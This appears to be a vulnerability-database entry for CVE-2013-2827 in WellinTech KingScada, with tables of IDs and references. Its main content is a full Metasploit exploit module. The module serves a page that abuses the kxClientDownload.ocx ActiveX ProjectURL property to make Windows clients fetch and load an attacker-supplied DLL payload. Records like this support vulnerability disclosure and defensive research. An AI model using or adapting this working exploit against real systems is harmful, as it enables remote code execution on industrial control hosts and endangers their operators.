ID
VAR-E-201401-0379
CVE
| cve_id: | CVE-2013-2827 | Trust: 2.4 |
EDB ID
31575
TITLE
KingScada - kxClientDownload.ocx ActiveX Remote Code Execution (Metasploit) - Windows remote Exploit
Trust: 0.6
DESCRIPTION
KingScada - kxClientDownload.ocx ActiveX Remote Code Execution (Metasploit). CVE-2013-2827CVE-102135 . remote exploit for Windows platform
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | kingscada | model: | - | scope: | - | version: | - | Trust: 1.6 |
| vendor: | kingscada | model: | kxclientdownload.ocx activex | scope: | - | version: | - | Trust: 0.5 |
| vendor: | wellintech | model: | kingscada | scope: | eq | version: | 3.0 | Trust: 0.3 |
EXPLOIT
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::BrowserExploitServer
include Msf::Exploit::EXE
def initialize(info = {})
super(update_info(info,
'Name' => 'KingScada kxClientDownload.ocx ActiveX Remote Code Execution',
'Description' => %q{
This module abuses the kxClientDownload.ocx ActiveX control distributed with WellingTech KingScada.
The ProjectURL property can be abused to download and load arbitrary DLLs from
arbitrary locations, leading to arbitrary code execution, because of a dangerous
usage of LoadLibrary. Due to the nature of the vulnerability, this module will work
only when Protected Mode is not present or not enabled.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Andrea Micalizzi', # aka rgod original discovery
'juan vazquez' # Metasploit module
],
'References' =>
[
['CVE', '2013-2827'],
['OSVDB', '102135'],
['BID', '64941'],
['ZDI', '14-011'],
['URL', 'http://ics-cert.us-cert.gov/advisories/ICSA-13-344-01']
],
'DefaultOptions' =>
{
'InitialAutoRunScript' => 'migrate -f',
},
'BrowserRequirements' =>
{
:source => /script|headers/i,
:os_name => Msf::OperatingSystems::WINDOWS,
:ua_name => /MSIE|KXCLIE/i
},
'Payload' =>
{
'Space' => 2048,
'StackAdjustment' => -3500,
'DisableNopes' => true
},
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic', { } ]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jan 14 2014'))
end
def on_request_exploit(cli, request, target_info)
print_status("Requested: #{request.uri}")
if request.uri =~ /\/libs\/.*\.dll/
print_good("Sending DLL payload")
send_response(cli,
generate_payload_dll(:code => get_payload(cli, target_info)),
'Content-Type' => 'application/octet-stream'
)
return
elsif request.uri =~ /\/libs\//
print_status("Sending not found")
send_not_found(cli)
return
end
content = <<-EOS
<html>
<body>
<object classid='clsid:1A90B808-6EEF-40FF-A94C-D7C43C847A9F' id='#{rand_text_alpha(10 + rand(10))}'>
<param name="ProjectURL" value="#{get_module_uri}"></param>
</object>
</body>
</html>
EOS
print_status("Sending #{self.name}")
send_response_html(cli, content)
end
end
Trust: 1.0
EXPLOIT LANGUAGE
rb
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
kxClientDownload.ocx ActiveX Remote Code Execution (Metasploit)
Trust: 1.0
TAGS
| tag: | Metasploit Framework (MSF) | Trust: 1.0 |
| tag: | exploit | Trust: 0.5 |
| tag: | arbitrary | Trust: 0.5 |
| tag: | code execution | Trust: 0.5 |
| tag: | activex | Trust: 0.5 |
CREDITS
Metasploit
Trust: 0.6
EXTERNAL IDS
| db: | ICS CERT | id: | ICSA-13-344-01 | Trust: 2.7 |
| db: | NVD | id: | CVE-2013-2827 | Trust: 2.4 |
| db: | EXPLOIT-DB | id: | 31575 | Trust: 1.6 |
| db: | EDBNET | id: | 77829 | Trust: 0.6 |
| db: | EDBNET | id: | 53146 | Trust: 0.6 |
| db: | PACKETSTORM | id: | 125155 | Trust: 0.5 |
| db: | BID | id: | 64941 | Trust: 0.3 |
REFERENCES
| url: | https://nvd.nist.gov/vuln/detail/cve-2013-2827 | Trust: 2.1 |
| url: | http://ics-cert.us-cert.gov/advisories/icsa-13-344-01 | Trust: 1.0 |
| url: | https://www.intelligentexploit.com | Trust: 0.6 |
| url: | https://www.exploit-db.com/exploits/31575/ | Trust: 0.6 |
SOURCES
| db: | BID | id: | 64941 |
| db: | PACKETSTORM | id: | 125155 |
| db: | EXPLOIT-DB | id: | 31575 |
| db: | EDBNET | id: | 77829 |
| db: | EDBNET | id: | 53146 |
LAST UPDATE DATE
2022-07-27T09:15:38.933000+00:00
SOURCES UPDATE DATE
| db: | BID | id: | 64941 | date: | 2014-08-01T01:11:00 |
SOURCES RELEASE DATE
| db: | BID | id: | 64941 | date: | 2014-01-14T00:00:00 |
| db: | PACKETSTORM | id: | 125155 | date: | 2014-02-11T01:51:06 |
| db: | EXPLOIT-DB | id: | 31575 | date: | 2014-02-11T00:00:00 |
| db: | EDBNET | id: | 77829 | date: | 2014-02-11T00:00:00 |
| db: | EDBNET | id: | 53146 | date: | 2014-02-11T00:00:00 |